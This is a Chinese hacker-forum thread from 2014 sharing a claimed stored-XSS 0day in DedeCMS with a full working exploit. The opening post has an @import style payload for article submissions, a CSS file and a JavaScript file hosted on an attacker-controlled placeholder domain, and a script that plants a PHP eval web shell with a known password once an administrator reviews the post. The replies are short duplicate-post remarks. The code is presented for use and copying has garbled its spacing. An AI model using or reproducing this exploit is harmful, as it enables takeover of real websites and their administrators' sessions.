查看: 11005|回复: 3

<转>Dedecms xss 0day通杀所有版本 可Getshell

[复制链接]
  • TA的每日心情
    郁闷
    2015-6-8 19:18
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2014-1-11 13:02:55 | 显示全部楼层 |阅读模式
    漏洞原因:
    DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个:开启注册开启投稿注册会员-发表文章投稿,
    内容如下填写:
    [AppleScript] 纯文本查看 复制代码
    <style>@im\port'\http://xxx.com/xss.css';</style>

    在你自己的网站xxx.com上新建xss.css内容如下:
    [AppleScript] 纯文本查看 复制代码
    body{background-image:url('javascript:document.write("<scriptsrc=http://xxx.com/xss.js></script>")') }

    在你自己的网站xxx.com上新建xss.js 内容如下:
    [AppleScript] 纯文本查看 复制代码
    varrequest =false;
    if(window.XMLHttpRequest){request =newXMLHttpRequest();
    if(request.overrideMimeType){request.overrideMimeType('text/xml');}}
     elseif(window.ActiveXObject){varversions =['Microsoft.XMLHTTP','MSXML.XMLHTTP','Microsoft.XMLHTTP','Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0','Msxml2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP'];for(vari=0;i<versions.length;i++){try{request =newActiveXObject(versions);}catch(e){}}}xmlhttp=request;functiongetFolder(url ){obj =url.split('/')returnobj[obj.length-2]}oUrl =top.location.href;u =getFolder(oUrl);add_admin();functionadd_admin(){varurl="/"+u+"/sys_sql_query.php";varparams ="fmdo=edit&backurl=&activepath=%2Fdata&filename=xxx.php&str=<%3Fphp+eval%28%24_POST%5Bxxx%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";xmlhttp.open("POST",url,true);xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");xmlhttp.setRequestHeader("Content-length",params.length);xmlhttp.setRequestHeader("Connection","Keep-Alive");xmlhttp.send(params);}

    当管理员审核这篇文章的时候,将自动在data目录生成一句话xxx.php。密码xxx。

                                                                                                                                              转自M4sk's blog
    回复

    使用道具 举报

  • TA的每日心情
    开心
    2017-1-9 18:10
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2014-1-11 13:20:55 | 显示全部楼层
    我发过了 这个~

    点评

    好吧。没注意。请管理删贴— —  详情 回复 发表于 2014-1-11 13:43
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2015-6-8 19:18
  • 签到天数: 1 天

    [LV.1]初来乍到

     楼主| 发表于 2014-1-11 13:43:02 | 显示全部楼层
    Diana 发表于 2014-1-11 13:20
    我发过了 这个~

    好吧。没注意。请管理删贴— —
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-1-12 07:08:43 | 显示全部楼层
    其实我看到
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-25 01:35 , Processed in 0.023976 second(s), 16 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部